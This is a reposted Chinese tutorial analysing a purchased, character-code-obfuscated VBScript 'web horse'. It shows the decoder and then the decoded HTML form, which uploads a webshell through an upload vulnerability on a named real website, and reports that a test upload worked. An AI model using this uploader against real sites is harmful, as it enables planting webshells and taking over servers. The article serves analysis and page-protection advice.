也想出现在这里? 联系我们

对某ASC加密网马的破解和利用

作者 : 小编 本文共2374个字,预计阅读时间需要6分钟 发布时间: 2021-06-22 共5.5K人阅读
也想出现在这里? 联系我们

QQ群中,有人在叫卖网马。网友花钱获得一个共享给我,让我看看。于是有了下面的这篇文章。
  1.网马初探

  在浏览器中打开网马,这个网马的功能比较简单,主要用来上传功能更强的网马。比较有特色的是可以在目标网页的上传漏洞,自己修改修改配置。查看该网马的源代码,发现该网马加密了,很明显是用ASC加密。(图1)

  2.网马分析

  虽然该网马的核心功能代码进行ASC加密了,但其框架一目了然。其代码及其解释如下:

<script language=vbscript>
'可以看到该网马是一个VB脚本
function rechange(k)
'定义了一个rechange函数,该函数定义了一个变量k
s=Split(k,",")
'split的作用是把k以“,”分开,把其定义为一个数组
t=""
给t赋空值;
For i = 0 To UBound(s)
t=t Chrw(eval(s(i)))
用for进行循环转换,把t值转换为字符,依次累加。UBound是数组的维数,Chrw是字符转换函数。
Next
rechange=t
把t返回到函数
End Function
t="60,33,68,79,67,84,89,80,69,32,104,116,109,108,32,80,85,66,76,73,67,32,34,45,47,47,87,51,67,47,47,68,84,68,32,88,72,84,77,76,32,49,46,48,32,84,114,97,110,115,105,116,105,111,110,97,108,47,……"
'中间省略N多,这就是网马的功能代码
document.write rechange(t)
'在浏览器中输出函数值
</script>

  3.网马解密

  可以自行编写一个ASC解密工具,笔者从网上下载了别人的ASC解密代码,然后根据该网马的加密原理进行修改重新编译生成解密工具。

  运行该工具,把该网马源代码t后面的值拷贝至工具相应的文本框中点击解密,即可还原该网马的源代码。(图2)

<body>
<form action=http://www.51iccard.com/upfile_other.asp method=post name=form1 onsubmit=return
click() enctype=multipart/form-data>
<p align="center"><span class="STYLE4"> 源(</span><span class="STYLE3">图片</span><span class="STYLE4">)文件:
</span>
<input name="filename" type="file" class="buttonUnActive" size="20">
<span class="STYLE4">
目标(</span><span class="STYLE3">大马</span><span class="STYLE4">)文件:
</span>
<input name="filename1" type=file class=buttonUnActive size=20></p>
<p align="center">
<input name=submit type=submit class="button" style=border"1px value=上传大马 double rgb(88.88.88);font:9pt>
<input name=imgwidth type=hidden id=imgwidth>
<input name=imgheight type=hidden id=imgheight>
<input name=aligntype type=hidden id="channelid" value="0">
<input name="channelid" type="hidden" id="channelurlid" value=0>
<input name="id" type="hidden" id="id2">
</p>

4.解密效果
  拷贝解密后的html代码保存为一test.htm文件,在浏览器中打开,进行上传测试成功,说明对该网马的ASC解密成功。(图3)

  5.加密利用

  在破解了该网马的ASC加密之后,我们利用该网马的加密原理对我们的网页进行加密,达到保护网页代码的效果。ASC加密主要用来保护静态页面代码,动态代码由于在服务器端,客户端显示的只是运行结果。“IT专家网”的页面是动态生成的,作为演示就以它为例进行。

  查看并拷贝网页代码,通过“ASCCII速查器”把字符转换成ASC值。然后把生成的ASC值拷贝到我们破解的网马代码中作为t的值。这样可以别人就不能看到网页源代码,看到的只是其的ASC值,对网页代码起到了一定的保护作用,运行效果和加密前完全一样。(图4)

  总结:ASC加密是当前静态网页加密的主要形式,从上面笔者对某网马的解密看,这种加密形式并不能从根本上保证网页代码的安全。基于笔者及其朋友网站维护的经验,推荐几种网页加密方法:

  1.脚本加密,通过类似VB、JAVA这样脚本代码实现:封锁鼠标右键、禁止查看源文件、链接调用地址加密等功能。

  2.IIS的密码,通过对IIS的安全、验证等部署,防止非授权的访问。

  3.ASP程序加密,使用ASP程序来给网页进行加密,现在大多数网站都使用ASP程序,它对Web服务器没有具体要求,而其加密就是借助数据库及ASP程序进行设计,来实现一种通用网页加密。

  4.软件加密,现在给网页加密的软件非常多,其基本原理都是利用javascript代码,只不过是这些软件都自动准备好了这些代码,只需使用者将网页源代码粘进去点击“加密”按钮就可以了。

1. 本站所提供的源码模板(主题/插件)等资源仅供学习交流,若使用商业用途,请购买正版授权,否则产生的一切后果将由下载用户自行承担,有部分资源为网上收集或仿制而来,若模板侵犯了您的合法权益,请来信通知我们(Email: rayer@88.com),我们会及时删除,给您带来的不便,我们深表歉意!
2. 分享目的仅供大家学习和交流,请不要用于商业用途!
3. 如果你也有好源码或者教程,可以到用户中心发布投稿,分享有金币奖励和额外收入!
4. 本站提供的源码、模板、插件等等其他资源,都不包含技术服务 请大家谅解!
5. 如有链接无法下载、失效或广告,请联系站长,可领回失去的金币,并额外有奖!
6. 如遇到加密压缩包,默认解压密码为"www.zyfx8.cn",如遇到无法解压的请联系管理员!
本站部分文章、资源来自互联网,版权归原作者及网站所有,如果侵犯了您的权利,请及时联系我站删除。免责声明
资源分享吧 » 对某ASC加密网马的破解和利用

常见问题FAQ

免费下载或者VIP会员专享资源能否直接商用?
本站所有资源版权均属于原作者所有,这里所提供资源均只能用于参考学习用,请勿直接商用。若由于商用引起版权纠纷,一切责任均由使用者承担。更多说明请参考 VIP介绍。
织梦模板使用说明
你下载的织梦模板并不包括DedeCMS使用授权,根据DedeCMS授权协议,除个人非盈利站点外,均需购买DedeCMS商业使用授权。购买地址: http://www.desdev.cn/service-dedecms.html

发表评论

Copyright 2015-2020 版权所有 资源分享吧 Rights Reserved. 蜀ICP备14022927号-1
开通VIP 享更多特权,建议使用QQ登录